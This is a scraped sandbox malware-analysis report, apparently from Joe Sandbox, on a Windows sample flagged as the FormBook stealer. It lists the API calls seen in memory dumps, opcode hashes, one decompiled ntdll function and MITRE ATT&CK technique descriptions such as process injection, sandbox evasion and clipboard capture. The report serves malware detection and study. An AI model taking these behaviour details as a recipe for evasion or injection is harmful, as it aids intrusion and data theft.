Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: A4E01AB1200204ABDB14DF59CC45EA777ACAF88750F014658BA0857291CA30E9108AF0

Uniqueness

Uniqueness Score: -1.00%

Function 00AF7260, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00AF72BA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00AF72DB

Memory Dump Source

Source File: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, Offset: 00AF0000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 53e5322b62eb909e761c59486e91cb807ee3ea7040c4705f1c47c4bf58bd69dc
Instruction ID: e708e993df64e1bb8d0bf0a27bc04fd024f74c3038c68b060b477d53dfd770a6
Opcode Fuzzy Hash: 53e5322b62eb909e761c59486e91cb807ee3ea7040c4705f1c47c4bf58bd69dc
Instruction Fuzzy Hash: CA01A231A803287AEB20A6D49C43FFF7B6C5B00B50F144159FF04BA1C2E6A46A0686F6

Uniqueness

Uniqueness Score: -1.00%

Function 00B08613, Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,00AFCF92,00AFCF92,?,00000000,?,?), ref: 00B08650

Memory Dump Source

Source File: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, Offset: 00AF0000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 2367966fc863a8acf948b46aad017ba3c96056db95a4b8eae0b7cdf438f9f6f4
Instruction ID: 6dd0acef36f7959ae9cd8d5a76384c3c9cad68dcf40f57b97522d0c694eb3cfe
Opcode Fuzzy Hash: 2367966fc863a8acf948b46aad017ba3c96056db95a4b8eae0b7cdf438f9f6f4
Instruction Fuzzy Hash: 7F017CB1600204BFDB14DF94CC85FEB7BA8EF44350F1145A9FA4DAB381CA35A9108BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00AF9B10, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00AF9B82

Memory Dump Source

Source File: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, Offset: 00AF0000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: e5f237d43460bf581f28d910543d27152089f06f4a547eccd8420a740f3aac7b
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: 640112B5D4020DABDF10EBE4DC42F9EB7B89B54308F004195FA0897181F671EB14C791

Uniqueness

Uniqueness Score: -1.00%

Function 00B0852D, Relevance: 1.5, APIs: 1, Instructions: 43processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00B08584

Memory Dump Source

Source File: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, Offset: 00AF0000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 62f0f447cb0d6cb040f3052d0187ba8882ba347ad09cc25d27809dcbd4ad77ad
Instruction ID: bb97653993ece1a70c5989c066c076a8db37904e2a8eee0c1ff29de98c1ea412
Opcode Fuzzy Hash: 62f0f447cb0d6cb040f3052d0187ba8882ba347ad09cc25d27809dcbd4ad77ad
Instruction Fuzzy Hash: F3019DB2204108AFCB54CF99DC81EEB7BA9AF8C354F158258FA4DA7251D630E955CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B08530, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00B08584

Memory Dump Source

Source File: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, Offset: 00AF0000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: a97315fb21a8e1f4d6422aebf598d4bad6586b48e79758200a084a3d73e1873f
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: C201AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97251CA30E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00B07000, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,00AFCCC0,?,?), ref: 00B0703C

Memory Dump Source

Source File: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, Offset: 00AF0000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 62f04777c52798b815406677a9859fb516d651de10f545abaf60b9ec6c18e6b3
Instruction ID: 6c88be0d327dc9bd33e63df9eb89b56a5d5b5cad42a1711ff2e89356baa3a535
Opcode Fuzzy Hash: 62f04777c52798b815406677a9859fb516d651de10f545abaf60b9ec6c18e6b3
Instruction Fuzzy Hash: D5E092733803043AE3306599AC03FA7B7DCCB81B20F140166FA0DEB2C1D995F80142A8

Uniqueness

Uniqueness Score: -1.00%

Function 00B06FF3, Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,00AFCCC0,?,?), ref: 00B0703C

Memory Dump Source

Source File: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, Offset: 00AF0000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: ef5ef866952a2587435cc1ea2851f91802d33cdcf1f736e2d43ea1b94772ba1c
Instruction ID: 78058b3a8ebce463aa49d38dd420543a9d99c92d29b2aa065340b983de8f49a0
Opcode Fuzzy Hash: ef5ef866952a2587435cc1ea2851f91802d33cdcf1f736e2d43ea1b94772ba1c
Instruction Fuzzy Hash: A3F0E5323D02003AE33126588C03F977BEC8F85B10F150159F749AA1C1C9A5B54187A8

Uniqueness

Uniqueness Score: -1.00%

Function 00B08480, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00B03506,?,00B03C7F,00B03C7F,?,00B03506,?,?,?,?,?,00000000,00000000,?), ref: 00B084AD

Memory Dump Source

Source File: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, Offset: 00AF0000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: 8f861d2417839929ff486ffab4e257493ffee16da6f5d48a9cc70e87f8bdd026
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: BDE01AB1200204ABDB14DF59CC41EA777ACAF88650F114558BA085B281C930F9108AF0

Uniqueness

Uniqueness Score: -1.00%

Function 00B08620, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,00AFCF92,00AFCF92,?,00000000,?,?), ref: 00B08650

Memory Dump Source

Source File: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, Offset: 00AF0000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 193a21b209262351485c4cd22487c223a15075db4f7fe6d14c69e62946ddf512
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 8AE01AB1200208ABDB10DF49CC85EE737ADAF88650F018164BA0857281C930E9108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 00AFD400, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,00AF7C63,?), ref: 00AFD42B

Memory Dump Source

Source File: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, Offset: 00AF0000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction ID: 557c6177cf17721ea8c37566754c580366dfa59bbfe8672def4b7327cb570358
Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction Fuzzy Hash: E2D05E657903083AE610AAA49C07F2632CD9B48B01F494064FA48972C3D960E5004171

Uniqueness

Uniqueness Score: -1.00%

Function 04B0967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04B09694

Memory Dump Source

Source File: 00000009.00000002.473551161.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true

Associated: 00000009.00000002.473875335.0000000004BBB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.473904145.0000000004BBF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cbe774aef497af05128902139a08cad897df03c89b7c34b61595848c9f30b6d3
Instruction ID: 19a7c12f2018f14f601814bec95284a66011731a66ca95b090792b4ac396b921
Opcode Fuzzy Hash: cbe774aef497af05128902139a08cad897df03c89b7c34b61595848c9f30b6d3
Instruction Fuzzy Hash: 74B09BB29014D5C5F711D76046087177D04F7D0745F56C5A5D1020645B4778E091F5B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 04B5FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E04B5FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E04B0CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04B55720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04B55720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x04b5fdda
0x04b5fde2
0x04b5fde5
0x04b5fdec
0x04b5fdfa
0x04b5fdff
0x04b5fe0a
0x04b5fe0f
0x04b5fe17
0x04b5fe1e
0x04b5fe19
0x04b5fe19
0x04b5fe19
0x04b5fe20
0x04b5fe21
0x04b5fe22
0x04b5fe25
0x04b5fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04B5FDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04B5FE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04B5FE01

Memory Dump Source

Source File: 00000009.00000002.473551161.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true

Associated: 00000009.00000002.473875335.0000000004BBB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.473904145.0000000004BBF000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 35aa9a4ddabf9e6209fcf10efbc8eb72cf6831a9305e543efcce70e18800b96b
Instruction ID: d00cd1b4e69d074f5c794ac4cfe881c38314a4255791ce421afad2a924c4fe8c
Opcode Fuzzy Hash: 35aa9a4ddabf9e6209fcf10efbc8eb72cf6831a9305e543efcce70e18800b96b
Instruction Fuzzy Hash: FEF0F032200201BFEA251A45DC06F73FF6AEB84730F244395FA68561E1EA62F86096F4

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report lpdKSOB78u.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

Function 00403486, Relevance: 91.4, APIs: 32, Strings: 20, Instructions: 366
stringcomfileCOMMON

Function 70481A98, Relevance: 20.1, APIs: 13, Instructions: 591
stringlibrarymemoryCOMMONCrypto

Function 00405A15, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 159
filestringCOMMON

Function 703C4243, Relevance: 4.6, APIs: 3, Instructions: 52
processCOMMON

Function 004065C1, Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Function 00403A60, Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Function 00402EF1, Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 208
memoryCOMMON

Function 703C372D, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 237
fileCOMMON

Function 00401759, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147
stringtimeCOMMON

Function 0040583A, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
COMMON

Function 004065E8, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 703C42E6, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 207
filememoryCOMMON

Function 004032BF, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 101
COMMON

Function 00405E15, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Function 704816DB, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Function 0040209D, Relevance: 6.1, APIs: 4, Instructions: 73
libraryloaderCOMMON

Function 004015BB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66
COMMON

Function 004031B7, Relevance: 3.1, APIs: 2, Instructions: 88
COMMON

Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Function 00406656, Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Function 00405DE6, Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Function 00405DC1, Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Function 004058B7, Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Function 00405E5E, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Function 00405E8D, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Function 70482921, Relevance: 1.5, APIs: 1, Instructions: 21
memoryCOMMON

Function 0040343E, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Function 004054B2, Relevance: 54.3, APIs: 36, Instructions: 282
windowclipboardmemoryCOMMON

Function 00404763, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 274
stringCOMMON

Function 0040216B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139
comCOMMON

Function 004027A1, Relevance: 1.5, APIs: 1, Instructions: 29
fileCOMMON

Function 00406A9B, Relevance: .3, Instructions: 334
COMMONCrypto

Function 00407272, Relevance: .3, Instructions: 300
COMMONCrypto